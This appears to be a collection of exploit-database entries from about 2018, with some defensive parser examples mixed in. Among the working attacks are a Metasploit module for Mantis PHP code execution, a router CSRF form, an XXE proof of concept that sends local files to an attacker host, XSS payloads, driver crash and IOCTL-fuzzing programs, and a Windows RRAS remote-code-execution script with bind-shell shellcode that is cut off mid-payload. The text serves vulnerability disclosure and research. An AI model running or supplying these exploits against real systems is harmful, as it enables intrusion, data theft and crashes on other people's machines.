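        fields = raw.split("\t")
        if len(fields) != len(FIELDS):
            continue
        domain, flag, path, secure, expires, name, value = fields
        if flag not in ("TRUE", "FALSE") or secure not in ("TRUE", "FALSE"):
            continue
        if not expires.isdigit() or not path.startswith("/") or not name:
            continue
        if _CTL.search(domain + path + name + value):
            continue
        cookies.append(dict(zip(FIELDS, fields)))
    return cookies


def set_cookie_is_wellformed(header_value):
    """Write-time check: RFC 6265 cookie-octets exclude control characters, so
    a Set-Cookie value carrying CR/LF/TAB is rejected before reaching the jar."""
    return _CTL.search(header_value) is None


def audit_jar(text):
    """Entries a lax reader honours but a strict one rejects: the suspicious
    records to look for in an existing jar file."""
    strict = {(c["domain"], c["name"]) for c in parse_jar_strict(text)}
    return [(c["domain"], c["name"]) for c in parse_jar_lax(text)
            if (c["domain"], c["name"]) not in strict]


if __name__ == "__main__":
    print("lax reader sees:   ", [(c["domain"], c["name"]) for c in parse_jar_lax(POISONED_JAR)])
    print("strict reader sees:", [(c["domain"], c["name"]) for c in parse_jar_strict(POISONED_JAR)])
    print("suspicious entries:", audit_jar(POISONED_JAR))
    print("header accepted:   ", set_cookie_is_wellformed(MALICIOUS_SET_COOKIE))
```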


Proof of Concept
----------------

1. Set up a minimal web server, good for 1 request:
 $ echo -ne 'HTTP/1.1 200 OK\r\nContent-Length: 0\r\nSet-Cookie: 
foo="bar\r\n\x20.google.com\tTRUE\t/\tFALSE\t1900000000\tinjected\tcookie\r\n\t";expires=Thursday, 01-Jan-2032 08:00:00 
GMT\r\n\r\n' | nc -v -l 7777

2. Fetch the evil url:
 $ wget --save-cookies jar.txt http://127.0.0.1:7777/plop

3. Examine the resulting cookie jar file:
 $ cat jar.txt


Vulnerable versions
-------------------

The following GNU Wget versions are confirmed vulnerable:

- 1.7 thru 1.19.4


Mitigation
----------

1. Upgrade to GNU Wget 1.19.5 or later, or to the appropriate security-updated
   package in your distribution


Credits
-------

The vulnerability was discovered by Harry Sintonen / F-Secure Corporation.


Timeline
--------

2018.04.26  discovered & reported the vulnerability
2018.04.27  CVE-2018-0494 assigned
2018.05.06  GNU Wget 1.19.5 released with the fix
2018.05.06  public disclosure of the advisory
            
# Exploit Title: Fastweb FASTgate 0.00.47 CSRF
# Date: 09-05-2018
# Exploit Authors: Raffaele Sabato
# Contact: https://twitter.com/syrion89
# Vendor: Fastweb
# Product Web Page: http://www.fastweb.it/adsl-fibra-ottica/dettagli/modem-fastweb-fastgate/
# Version: 0.00.47
# CVE: CVE-2018-6023

I DESCRIPTION
========================================================================

An issue was discovered in the Fastweb FASTgate 0.00.47 device. A Cross-Site Request Forgery (CSRF) vulnerability allows remote attackers to hijack the authentication of users for requests that modify the configuration. This vulnerability may lead to Guest Wi-Fi activation, Wi-Fi password changes, etc.
The vulnerability was disclosed to Fastweb on 19 January 2018.
Fastweb independently patched customer devices with the non-vulnerable version .67 from December 2017 through March 2018.

II PROOF OF CONCEPT
========================================================================

## Activate Guest Wi-Fi:

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.1.254/status.cgi">
      <input type="hidden" name="&#95;" value="1516312144136" />
      <input type="hidden" name="act" value="nvset" />
      <input type="hidden" name="hotspot&#95;broadcast&#95;ssid" value="1" />
      <input type="hidden" name="hotspot&#95;enable" value="1" />
      <input type="hidden" name="hotspot&#95;filtering" value="all" />
      <input type="hidden" name="hotspot&#95;security" value="WPA2PSK" />
      <input type="hidden" name="hotspot&#95;ssid" value="GUEST&#45;Test" />
      <input type="hidden" name="hotspot&#95;timeout" value="&#45;1" />
      <input type="hidden" name="service" value="wl&#95;guestaccess" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

III REFERENCES
========================================================================
http://www.fastweb.it/myfastpage/assistenza/guide/FASTGate/
            
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Mantis manage_proj_page PHP Code Execution',
      'Description'    => %q{
        Mantis v1.1.3 and earlier are vulnerable to a post-authentication Remote
        Code Execution vulnerability in the sort parameter of the
        manage_proj_page.php page.
      },
      'Author'         => [
        'EgiX',           # Exploit-DB Entry Author
        'Lars Sorenson'   # MSF module author
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['EDB', '6768'],
          ['CVE', '2008-4687'],
        ],
       'Privileged' => false,
       'Platform'   => ['php'],
       'Arch'       => ARCH_PHP,
       'Targets' =>
          [
            [ 'Mantis <= 1.1.3', { } ],
          ],
      'DisclosureDate' => 'Oct 16, 2008',
      'DefaultTarget' => 0))
     register_options(
      [
        OptString.new('TARGETURI', [true, 'The path to the Mantis installation', '/mantisbt/']),
        OptString.new('USERNAME', [true, 'The username to log in as', 'administrator']),
        OptString.new('PASSWORD', [true, 'The password to log in with', 'root']),
      ])
  end

  def check
    vprint_status('Checking Mantis version ...')
    res = send_request_cgi({
      'uri'    => normalize_uri(target_uri.path, 'login_page.php'),
      'method' => 'GET'
    })

    unless res
      vprint_error('Connection to host failed!')
      return CheckCode::Unknown
    end

    unless res.body =~ /Mantis ([0-9]+\.[0-9]+\.[0-9]+)/
      vprint_error('Cannot determine Mantis version!')
      return CheckCode::Unknown
    end

    version = Gem::Version.new(Regexp.last_match[1])

    vprint_status("Mantis version #{version} detected")

    if res.code == 200 && version <= Gem::Version.new('1.1.3')
      return CheckCode::Appears
    end

    CheckCode::Safe
  end

  def login
    vprint_status("Logging in as #{datastore['username']}:#{datastore['password']} ... ")
    res = send_request_cgi({
        'method'   => 'GET',
        'uri'      => normalize_uri(target_uri.path, 'login_page.php'),
    })
    unless res
      fail_with(Failure::Unreachable, 'Cannot access host to log in!')
    end

    res = send_request_cgi({
      'uri'       => normalize_uri(target_uri.path, 'login.php'),
      'method'    => 'POST',
      'vars_post' => {
        # String keys: Rex URI-encodes form variable names, so use plain
        # strings rather than the 'key': symbol shorthand.
        'username' => datastore['USERNAME'],
        'password' => datastore['PASSWORD']
      },
      'cookie'=> "PHPSESSID=#{res.get_cookies}"
    })
    unless res
      fail_with(Failure::Unknown, 'Cannot access host to log in!')
    end

    fail_with(Failure::Unreachable, 'Login failed!') unless res.code == 302
    fail_with(Failure::NoAccess, 'Wrong credentials!') if res.redirection.to_s.include?('login_page.php')

    store_valid_credential(user: datastore['USERNAME'], private: datastore['PASSWORD'])
    res.get_cookies
  end

  def exploit
    fail_with(Failure::NotVulnerable, 'Target is not vulnerable!') unless check == CheckCode::Appears

    cookie = login
    vprint_status('Sending payload ...')
    payload_b64 = Rex::Text.encode_base64(payload.encoded)
    data = {
      'sort' => "']);}error_reporting(0);print(_code_);eval(base64_decode($_SERVER[HTTP_CMD]));die();#",
    }
    send_request_cgi({
      'uri'       => normalize_uri(target_uri.path, 'manage_proj_page.php'),
      'method'    => 'POST',
      'vars_post' => data,
      'headers'   => {
        'Connection' => 'close',
        'Cookie'     => cookie.to_s,
        'Cmd'        => payload_b64   # eval'd by the injected sort parameter
      }
    })
  end
end
            
/*
Title: Dell Touchpad - ApMsgFwd.exe Denial Of Service
Author: Souhail Hammou
Vendor Homepage: https://www.alps.com/
Tested on : Alps Pointing-device Driver 10.1.101.207
CVE: CVE-2018-10828
*/

#include <stdio.h>
#include <stdlib.h>
#include <windows.h>

/*
Details:
==========
ApMsgFwd.exe, which ships with Dell Touchpad, the ALPS Touchpad driver, the ALPS pointing-device driver for VAIO, the ThinkPad UltraNav driver, etc.,
allows the current user to map and write to the "ApMsgFwd File Mapping Object" section.
ApMsgFwd.exe uses the data written to the section as arguments to functions,
so writing invalid pointers into the mapped section causes a denial of service.

The crash :
===========
(b88.aa0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
KERNELBASE!MultiByteToWideChar+0x3d8:
00007ffc`06422e08 443830          cmp     byte ptr [rax],r14b ds:d05d05d0`5d05d05d=??
0:004> r
rax=d05d05d05d05d05d rbx=00000000000004e4 rcx=000000007fffffff
rdx=0000000000000000 rsi=00000000ffffffff rdi=d05d05d05d05d05d
rip=00007ffc06422e08 rsp=000000000272fae0 rbp=000000000272fb59
 r8=0000000000000000  r9=00000000ffffffff r10=0000000000000000
r11=000000000272fbc0 r12=00000000000001f4 r13=0000000000000000
r14=0000000000000000 r15=0000000000563e40
iopl=0         nv up ei pl zr na po nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
KERNELBASE!MultiByteToWideChar+0x3d8:
00007ffc`06422e08 443830          cmp     byte ptr [rax],r14b ds:d05d05d0`5d05d05d=??


0:001> lm v m ApMsgFwd
Browse full module list
start             end                 module name
00000000`00400000 00000000`00415000   ApMsgFwd   (no symbols)
    Loaded symbol image file: C:\Program Files\DellTPad\ApMsgFwd.exe
    Image path: C:\Program Files\DellTPad\ApMsgFwd.exe
    Image name: ApMsgFwd.exe
    Browse all global symbols  functions  data
    Timestamp:        Tue Jul  1 09:03:05 2014 (53B27949)
    CheckSum:         00020F5D
    ImageSize:        00015000
    File version:     8.1.0.44
    Product version:  8.1.0.44
    File flags:       0 (Mask 3F)
    File OS:          40004 NT Win32
    File type:        1.0 App
    File date:        00000000.00000000
    Translations:     0411.04b0
    CompanyName:      Alps Electric Co., Ltd.
    ProductName:      ApMsgFwd
    InternalName:     ApMsgFwd
    OriginalFilename: ApMsgFwd.exe
    ProductVersion:   8, 1, 0, 44
    FileVersion:      8, 1, 0, 44
    PrivateBuild:     8, 1, 0, 44
    SpecialBuild:     8, 1, 0, 44
    FileDescription:  ApMsgFwd
    LegalCopyright:   Copyright (C) 2006-2014 Alps Electric Co., Ltd.
    LegalTrademarks:  Copyright (C) 2006-2014 Alps Electric Co., Ltd.
    Comments:         Copyright (C) 2006-2014 Alps Electric Co., Ltd.
*/
int main(int argc, char** argv)
{
    HANDLE ApMpHnd,StartEvtHnd,KeyHnd;
    PBYTE MappedBuf;

    if ( ! (ApMpHnd = OpenFileMappingA(FILE_MAP_WRITE,FALSE,"ApMsgFwd File Mapping Object") ) )
    {
        printf("OpenFileMapping Failed !\n");
        goto ret;
    }

    if ( ! ( MappedBuf = MapViewOfFile(ApMpHnd,FILE_MAP_WRITE,0,0,0x1A0) ) )
    {
        printf("MapViewOfFile Failed !\n");
        goto cleanup_0;
    }

    StartEvtHnd = OpenEventA(EVENT_MODIFY_STATE,FALSE,"ApMsgFwd Event Start");

    if ( ! StartEvtHnd )
    {
        printf("OpenEvent Failed !\n");
        goto cleanup_1;
    }

    ZeroMemory(MappedBuf,0x1A0);
    *MappedBuf = 9; //switch case 9
    *(DWORD*)(MappedBuf + 0x60) = 0x5D05D05D;
    *(DWORD*)(MappedBuf + 0x64) = 0xD05D05D0;

    /*Wake up the waiting thread*/
    SetEvent(StartEvtHnd);
    
    CloseHandle(StartEvtHnd);
cleanup_1:
    UnmapViewOfFile(MappedBuf);
cleanup_0:
    CloseHandle(ApMpHnd);
ret:
    return 0;
}
            
# Exploit Title: MyBB Latest Posts on Profile Plugin v1.1 - Cross-Site Scripting
# Date: 4/20/2018
# Author: 0xB9
# Contact: luxorforums.com/User-0xB9 or 0xB9[at]pm.me
# Software Link: https://community.mybb.com/mods.php?action=view&pid=914
# Version: 1.1
# Tested on: Ubuntu 17.10
# CVE: CVE-2018-10580


1. Description:
Adds a new section to user profiles that will display their last posts.
 

2. Proof of Concept:

Persistent XSS
- Create a thread with the following subject <script>alert('XSS')</script>
- Now visit your profile to see the alert.


3. Solution:
I reported the plugin twice over the past 3 weeks and received no response.


The following should be added at line 236 to properly sanitize thread subjects.

$d['tsubject'] = htmlspecialchars_uni($d['tsubject']);
            
[+] Exploit Title: ModbusPal XXE Injection
[+] Date: 05-08-2018
[+] Exploit Author: Trent Gordon
[+] Vendor Homepage: http://modbuspal.sourceforge.net/
[+] Software Link: https://sourceforge.net/projects/modbuspal/files/latest/download?source=files
[+] Version: 1.6b
[+] Tested on: Ubuntu 16.04 with Java 1.8.0_151
[+] CVE: CVE-2018-10832

1. Vulnerability Description

ModbusPal 1.6b is vulnerable to an XML External Entity (XXE) attack.  Projects are saved as .xmpp files and automations can be exported as .xmpa files, both XML-based and vulnerable to XXE injection.  Sending a crafted .xmpp or .xmpa file to a user, when opened/imported in ModbusPal 1.6b, will return the contents of any local files to a remote attacker.

2. Proof of Concept

a.) python -m SimpleHTTPServer 9999 (listening on ATTACKERS-IP and hosting evil.xml)

b.) Contents of hosted "evil.xml"

<!ENTITY % data SYSTEM "file:///etc/issue">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://ATTACKERS-IP:9999/?%data;'>">

c.) Example Exploited "xxe.xmpa"

<?xml version="1.0" ?>

<!DOCTYPE r [

<!ELEMENT r ANY >

<!ENTITY % sp SYSTEM "http://ATTACKERS-IP:9999/evil.xml">

%sp;

%param1;

]>

<r>&exfil;</r>

<!DOCTYPE modbuspal_automation SYSTEM "modbuspal.dtd">

<modbuspal_automation>

<automation name="temp" step="1.0" loop="true" init="0.0">

</automation>

</modbuspal_automation>

3. Additional Details

Java 1.7 contains certain defenses against XXE, including throwing a java.net.MalformedURLException when certain characters (such as '\n') are included in a URL.  This means that the file exfiltrated in the above attack is limited to single-line files that don't contain any restricted characters.  The above PoC uses /etc/issue, which is one of the few common Linux files that meets these criteria.  Exploitation of this vulnerability on later versions of Java requires a more creative approach than described above, such as exfiltrating over FTP instead of HTTP to retrieve /etc/passwd.
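The parser hardening that closes the issue above, as an added example that is not ModbusPal's code (ModbusPal is Java; this is a Python loader for the .xmpa format built on the standard expat binding). It refuses a DOCTYPE with an internal subset, any entity declaration and any external entity resolution, so neither the remote parameter entity nor the &exfil; reference from the PoC is ever resolved. Both sample files are constructed here; attacker.invalid is a placeholder host.

```python
import xml.parsers.expat as expat


class UnsafeXML(ValueError):
    """Raised when an .xmpa file uses a construct ModbusPal files never need."""


def load_automation(data: bytes) -> dict:
    """Parse an .xmpa file and return its <automation> attributes keyed by name.

    Three independent checks stop the XXE pattern from the PoC:
      1. parameter entities are never processed, so %sp; is inert and the
         external DTD named by a legitimate DOCTYPE is not fetched;
      2. a DOCTYPE with an internal subset (the '[ ... ]' block that carries
         the <!ENTITY> lines) is rejected outright;
      3. any entity declaration or external entity reference that still
         reaches the parser aborts the parse before expansion.
    """
    automations = {}
    parser = expat.ParserCreate()
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def start_doctype(name, sysid, pubid, has_internal_subset):
        if has_internal_subset:
            raise UnsafeXML(f"DOCTYPE {name!r} carries an internal subset")
        if name != "modbuspal_automation":
            raise UnsafeXML(f"unexpected document type {name!r}")

    def entity_decl(name, is_param, value, base, sysid, pubid, notation):
        kind = "parameter" if is_param else "general"
        raise UnsafeXML(f"{kind} entity {name!r} declared")

    def external_ref(context, base, sysid, pubid):
        return 0  # tells expat to fail the parse instead of resolving

    def start_element(name, attrs):
        if name == "automation":
            automations[attrs.get("name", "")] = dict(attrs)

    parser.StartDoctypeDeclHandler = start_doctype
    parser.EntityDeclHandler = entity_decl
    parser.ExternalEntityRefHandler = external_ref
    parser.StartElementHandler = start_element
    try:
        parser.Parse(data, True)
    except expat.ExpatError as exc:
        raise UnsafeXML(f"malformed or unsafe XML: {exc}") from exc
    return automations


def is_safe(data: bytes) -> bool:
    """True when the file parses under the rules above, False otherwise."""
    try:
        load_automation(data)
        return True
    except UnsafeXML:
        return False


# Constructed legitimate automation file, shaped like the tail of the PoC.
SAFE_XMPA = b"""<?xml version="1.0" ?>
<!DOCTYPE modbuspal_automation SYSTEM "modbuspal.dtd">
<modbuspal_automation>
<automation name="temp" step="1.0" loop="true" init="0.0">
</automation>
</modbuspal_automation>
"""

# Constructed file shaped like the PoC's xxe.xmpa; the host is a placeholder.
XXE_XMPA = b"""<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY % sp SYSTEM "http://attacker.invalid:9999/evil.xml">
%sp;
%param1;
]>
<r>&exfil;</r>
"""

if __name__ == "__main__":
    print(load_automation(SAFE_XMPA))
    print("PoC-shaped file accepted?", is_safe(XXE_XMPA))
```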
            
# Exploit Title: Open-AudIT Community - 2.2.0 – Cross-Site Scripting
# Exploit Author: Tejesh Kolisetty     #
# Vendor Homepage: https://opmantek.com/
# Software Link: https://opmantek.com/network-tools-download/
# Affected Version: 2.2.0
# Category: WebApps
# Tested on: Win7 Professional
# CVE : CVE-2018-10314

# 1. Vendor Description:
# Network Discovery and Inventory Software | Open-AudIT | Opmantek
# Discover what's on your network. Open-AudIT is the world's leading network discovery, inventory and audit program. Used by over 10,000 customers.

# 2. Technical Description:
# A cross-site scripting (XSS) vulnerability exists in multiple pages of Open-AudIT Community 2.2.0 that allows remote attackers to inject arbitrary web script or HTML, as demonstrated in the PoC below.

# 3. Proof of Concept:
# a) Log in as a user who has access to download scripts
# b) Navigate to Discover -> Audit Scripts -> List Scripts -> Download
# c) Click Download on any script
# d) Capture the request with Burp Suite and append the payload below to the 'action' parameter: =download"><script>alert('XSS')</script>
# e) The script then executes in the browser and shows the popup.

# Multiple Instances:
Discover -> Audit Scripts -> List Scripts -> Download
Admin -> Logs -> View System Logs
Admin -> Logs -> View Access Logs
etc.

# 4. Solution:     
# Upgrade to latest release Open-AudIT 2.2.1
# http://dl-openaudit.opmantek.com/OAE-Win-x86_64-release_2.2.1.exe
            
# Exploit Title: Open-AudIT Professional 2.1.1 – Multiple Cross-Site Scripting 
# Exploit Author: Tejesh Kolisetty
# Vendor Homepage: https://opmantek.com/
# Software Link: https://opmantek.com/network-tools-download/
# Affected Version: 2.1.1
# Category: WebApps
# Tested on: Win7 Professional
# CVE : CVE-2018-9155

# 1. Vendor Description:
# Network Discovery and Inventory Software | Open-AudIT | Opmantek
# Discover what's on your network. Open-AudIT is the world's leading network discovery, inventory and audit program. Used by over 10,000 customers.

# 2. Technical Description:
# A cross-site scripting (XSS) vulnerability exists in multiple pages of
# Open-AudIT Professional 2.1.1 that allows remote attackers to inject
# arbitrary web script or HTML, as demonstrated in the PoC below.

# 3. Proof of Concept:
# a) Log in as a user who has the Attributes Creation role
# b) Navigate to Manage -> Attributes -> Create Attributes
# c) Fill in the form with the XSS payload in the 'Name' field and submit. Payload: <script>alert('XSS')</script>
# d) Once the data is saved, the script executes.

# Multiple Instances:
Admin -> Logs -> View System Logs
Manage -> Attributes -> Create Attributes
Manage -> Users -> Create Users

# 4. Solution:
# Apply the following upstream commits:
# https://github.com/Opmantek/open-audit/commit/aab685484446126a58a49b994ba5dfae6e92f4db#diff-e6d7b17fe09e809cb98cdf38b7f12638
# https://github.com/Opmantek/open-audit/commit/755a9af8895a9e28fac82d8add7012f77bb9a8d2
# Or Upgrade to latest release Open-AudIT Professional
# https://opmantek.com/network-tools-download/
            
# Exploit Title: [BSOD  by IOCTL 0x002220e0 in 2345BdPcSafe.sys  of 2345 Security Guard 3.7]
# Date: [20180509]
# Exploit Author: [anhkgg]
# Vendor Homepage: [http://safe.2345.cc/]
# Software Link: [http://dl.2345.cc/2345pcsafe/2345pcsafe_v3.7.0.9345.exe]
# Version: [v3.7]
# Tested on: [Windows X64]
# CVE : [CVE-2018-10830]

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <time.h>

struct NETFW_IOCTL_ADD_PID
{
	DWORD pid;
	char seed[0x14];//4 + 14
};//0x18

#pragma pack(push)
#pragma pack(1)
struct NETFW_IOCTL_SET_PID
{
	BYTE set_state;//
	WORD buf_len;//1
	DWORD pid;//3
	char buf[0x64];//7
};//6B
#pragma pack(pop)

int __stdcall f_XOR__12A30(BYTE *a1, BYTE *a2)
{
	BYTE *a1_; // eax

	a1_ = a1;
	*a1_ ^= *a2;
	*a2 ^= *a1;
	*a1_ ^= *a2;
	return (int)a1_;
}

int __stdcall sub_12A80(char *a1, int len, char *a3)
{
	int result;
	unsigned __int8 v4;
	__int16 i;
	__int16 j;
	unsigned __int8 k;

	for (i = 0; i < 256; ++i)
		a3[i] = i;
	a3[256] = 0;
	a3[257] = 0;
	k = 0;
	v4 = 0;
	result = 0;
	for (j = 0; j < 256; ++j)
	{
		v4 += a3[j] + a1[k];
		f_XOR__12A30((BYTE*)&a3[j], (BYTE*)&a3[v4]);
		result = (k + 1) / len;
		k = (k + 1) % len;
	}
	return result;
}

char *__stdcall sub_12B60(char *a1, signed int len, char *a3)
{
	char *v3; // esi
	unsigned int v4; // ebx
	unsigned __int8 result; // al
	int v6; // edi
	char *v7; // ST18_4
	int v8; // [esp+14h] [ebp-8h]
	int v9; // [esp+18h] [ebp-4h]
	unsigned __int8 v10; // [esp+2Fh] [ebp+13h]

	v3 = a3;
	v4 = a3[256];
	result = a3[257];
	v9 = 0;
	if (len > 0)
	{
		v6 = (unsigned __int8)v4;
		v8 = 0;
		while (1)
		{
			v4 = (v6 + 1) & 0x800000FF;
			v6 = (unsigned __int8)v4;
			v10 = v3[(unsigned __int8)v4] + result;
			v7 = &v3[v10];
			f_XOR__12A30((BYTE*)&v3[(unsigned __int8)v4], (BYTE*)v7);
			a1[v8] ^= v3[(unsigned __int8)(v3[(unsigned __int8)v4] + *v7)];
			v8 = (signed __int16)++v9;
			if ((signed __int16)v9 >= len)
				break;
			result = v10;
		}
		result = v10;
	}
	v3[256] = v4;
	v3[257] = result;
	return (char *)result;
}

void calc_seed(char* seed, char* dst)
{
	char Source1[26] = { 0 };
	char a3[300] = { 0 };

	Source1[0] = 8;
	Source1[1] = 14;
	Source1[2] = 8;
	Source1[3] = 10;
	Source1[4] = 2;
	Source1[5] = 3;
	Source1[6] = 29;
	Source1[7] = 23;
	Source1[8] = 13;
	Source1[9] = 3;
	Source1[10] = 15;
	Source1[11] = 22;
	Source1[12] = 15;
	Source1[13] = 7;
	Source1[14] = 91;
	Source1[15] = 4;
	Source1[16] = 18;
	Source1[17] = 26;
	Source1[18] = 26;
	Source1[19] = 3;
	Source1[20] = 4;
	Source1[21] = 1;
	Source1[22] = 15;
	Source1[23] = 25;
	Source1[24] = 10;
	Source1[25] = 13;

	sub_12A80(seed, 0x14, a3);       
	sub_12B60(Source1, 0x1A, a3);
	memcpy(dst, Source1, 26);
}

BOOL BypassChk(HANDLE h)
{
	DWORD BytesReturned = 0;

	DWORD ctlcode = 0x222090;
	NETFW_IOCTL_ADD_PID add_pid = { 0 };
	add_pid.pid = GetCurrentProcessId();

	if (!DeviceIoControl(h, ctlcode, &add_pid, sizeof(NETFW_IOCTL_ADD_PID), &add_pid, sizeof(NETFW_IOCTL_ADD_PID), &BytesReturned, NULL)) {
		printf("[-] DeviceIoControl %x error: %d\n", ctlcode, GetLastError());
		return FALSE;
	}

	ctlcode = 0x222094;
	NETFW_IOCTL_SET_PID set_pid = { 0 };
	set_pid.pid = GetCurrentProcessId();
	set_pid.set_state = 1;

	calc_seed(add_pid.seed, set_pid.buf);
	set_pid.buf_len = 26;

	if (!DeviceIoControl(h, ctlcode, &set_pid, sizeof(NETFW_IOCTL_SET_PID), &set_pid, sizeof(NETFW_IOCTL_SET_PID), &BytesReturned, NULL)) {
		printf("[-] DeviceIoControl %x error: %d\n", ctlcode, GetLastError());
		return FALSE;
	}

	return TRUE;
}

HANDLE OpenDevice(char* path)
{
	return CreateFileA(path,
		GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE,
		NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
}

CHAR asciiString10[0x10];
CHAR asciiString100[0x100];
CHAR asciiString1000[0x1000];
WCHAR unicodeString10[0x10];
WCHAR unicodeString100[0x100];
WCHAR unicodeString1000[0x1000];
DWORD tableDwords[0x100];

DWORD FuzzConstants[] = {
	0x00000000, 0x00000001, 0x00000004, 0xFFFFFFFF,
	0x00001000, 0xFFFF0000, 0xFFFFFFFE, 0xFFFFFFF0,
	0xFFFFFFFC, 0x70000000, 0x7FFEFFFF, 0x7FFFFFFF,
	0x80000000,
	(DWORD)asciiString10,
	(DWORD)asciiString100,
	(DWORD)asciiString1000,
	(DWORD)unicodeString10,
	(DWORD)unicodeString100,
	(DWORD)unicodeString1000,
	(DWORD)tableDwords
};

/* Period parameters */
#define N 624
#define M 397
#define MATRIX_A 0x9908b0dfUL   /* constant vector a */
#define UPPER_MASK 0x80000000UL /* most significant w-r bits */
#define LOWER_MASK 0x7fffffffUL /* least significant r bits */

static unsigned long mt[N]; /* the array for the state vector  */
static int mti = N + 1; /* mti==N+1 means mt[N] is not initialized */

/* initializes mt[N] with a seed */
void init_genrand(unsigned long s)
{
	mt[0] = s & 0xffffffffUL;
	for (mti = 1; mti < N; mti++) {
		mt[mti] =
			(1812433253UL * (mt[mti - 1] ^ (mt[mti - 1] >> 30)) + mti);
		/* See Knuth TAOCP Vol2. 3rd Ed. P.106 for multiplier. */
		/* In the previous versions, MSBs of the seed affect   */
		/* only MSBs of the array mt[].                        */
		/* 2002/01/09 modified by Makoto Matsumoto             */
		mt[mti] &= 0xffffffffUL;
		/* for >32 bit machines */
	}
}

/* generates a random number on [0,0xffffffff]-interval */
unsigned long genrand_int32(void)
{
	unsigned long y;
	static unsigned long mag01[2] = { 0x0UL, MATRIX_A };
	/* mag01[x] = x * MATRIX_A  for x=0,1 */

	if (mti >= N) { /* generate N words at one time */
		int kk;

		if (mti == N + 1)   /* if init_genrand() has not been called, */
			init_genrand(5489UL); /* a default initial seed is used */

		for (kk = 0; kk < N - M; kk++) {
			y = (mt[kk] & UPPER_MASK) | (mt[kk + 1] & LOWER_MASK);
			mt[kk] = mt[kk + M] ^ (y >> 1) ^ mag01[y & 0x1UL];
		}
		for (; kk < N - 1; kk++) {
			y = (mt[kk] & UPPER_MASK) | (mt[kk + 1] & LOWER_MASK);
			mt[kk] = mt[kk + (M - N)] ^ (y >> 1) ^ mag01[y & 0x1UL];
		}
		y = (mt[N - 1] & UPPER_MASK) | (mt[0] & LOWER_MASK);
		mt[N - 1] = mt[M - 1] ^ (y >> 1) ^ mag01[y & 0x1UL];

		mti = 0;
	}

	y = mt[mti++];

	/* Tempering */
	y ^= (y >> 11);
	y ^= (y << 7) & 0x9d2c5680UL;
	y ^= (y << 15) & 0xefc60000UL;
	y ^= (y >> 18);

	return y;
}

unsigned long getrand(unsigned long min, unsigned long max)
{
	return (genrand_int32() % (max - min + 1)) + min;
}

//3.7.0.2860
int poc_2345NetFirewall()
{
	
	DWORD BytesReturned = 0;

	HANDLE h = OpenDevice("\\\\.\\2345BdPcSafe");
	if (h == INVALID_HANDLE_VALUE) {
		printf("[-] Open device error: %d\n", GetLastError());
		return 1;
	}

	if (!BypassChk(h)) {
		printf("[-] error!");
		return 1;
	}

	DWORD ctlcode = 0x002220e0;
	BYTE  bufInput[0x10000] = { 0 };
	BYTE  bufOutput[0x10000] = { 0 };

	srand(time(NULL));
	int count = 0;
	while (count++ < 1000) {
		// Choose a random length for the buffer
		size_t randomLength = getrand(4, 0x400);

		for (int i = 0; i < randomLength; i = i + 4) {
			int fuzzData = FuzzConstants[getrand(0, (sizeof(FuzzConstants) / 4) - 1)];

			// Choose a random element into FuzzConstants
			bufInput[i] = fuzzData & 0x000000ff;
			bufInput[i + 1] = (fuzzData & 0x0000ff00) >> 8;
			bufInput[i + 2] = (fuzzData & 0x00ff0000) >> 16;
			bufInput[i + 3] = (fuzzData & 0xff000000) >> 24;
		}

		DeviceIoControl(h,
			ctlcode,
			bufInput,
			randomLength,
			bufOutput,
			0,
			&BytesReturned,
			NULL);

		Sleep(10);
	}

	return 0;
}

int main()
{
	poc_2345NetFirewall();

	printf("poc failed!\n");

	getchar();
		
	return 0;
}
            
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#Tested on Windows Server 2003 SP2 (ES). Only works when the RRAS service is enabled.

#The exploited vulnerability is an arbitrary pointer dereference affecting the dwVarID field of the MIB_OPAQUE_QUERY structure.
#dwVarID (sent by the client) is used as a pointer into an array of functions. The application does not check whether the pointer
#falls outside the bounds of the array, so it is possible to jump to specific portions of memory and achieve remote code execution.
#Microsoft has not released a patch for Windows Server 2003, so consider disabling the RRAS service if you are still using
#Windows Server 2003.

#Exploit created by: Víctor Portal
#For learning purposes only

import struct
import sys
import time
import os

from threading import Thread    
                                
from impacket import smb
from impacket import uuid
from impacket import dcerpc
from impacket.dcerpc.v5 import transport
                 
target = sys.argv[1]

print '[-]Initiating connection'
trans = transport.DCERPCTransportFactory('ncacn_np:%s[\\pipe\\browser]' % target)
trans.connect()

print '[-]connected to ncacn_np:%s[\\pipe\\browser]' % target
dce = trans.DCERPC_class(trans)

#RRAS DCE-RPC endpoint
dce.bind(uuid.uuidtup_to_bin(('8f09f000-b7ed-11ce-bbd2-00001a181cad', '0.0')))

#msfvenom -a x86 --platform windows -p windows/shell_bind_tcp lport=4444 -b "\x00" -f python
buf =  ""
buf += "\xb8\x3c\xb1\x1e\x1d\xd9\xc8\xd9\x74\x24\xf4\x5a\x33"
buf += "\xc9\xb1\x53\x83\xc2\x04\x31\x42\x0e\x03\x7e\xbf\xfc"
buf += "\xe8\x82\x57\x82\x13\x7a\xa8\xe3\x9a\x9f\x99\x23\xf8"
buf += "\xd4\x8a\x93\x8a\xb8\x26\x5f\xde\x28\xbc\x2d\xf7\x5f"
buf += "\x75\x9b\x21\x6e\x86\xb0\x12\xf1\x04\xcb\x46\xd1\x35"
buf += "\x04\x9b\x10\x71\x79\x56\x40\x2a\xf5\xc5\x74\x5f\x43"
buf += "\xd6\xff\x13\x45\x5e\x1c\xe3\x64\x4f\xb3\x7f\x3f\x4f"
buf += "\x32\x53\x4b\xc6\x2c\xb0\x76\x90\xc7\x02\x0c\x23\x01"
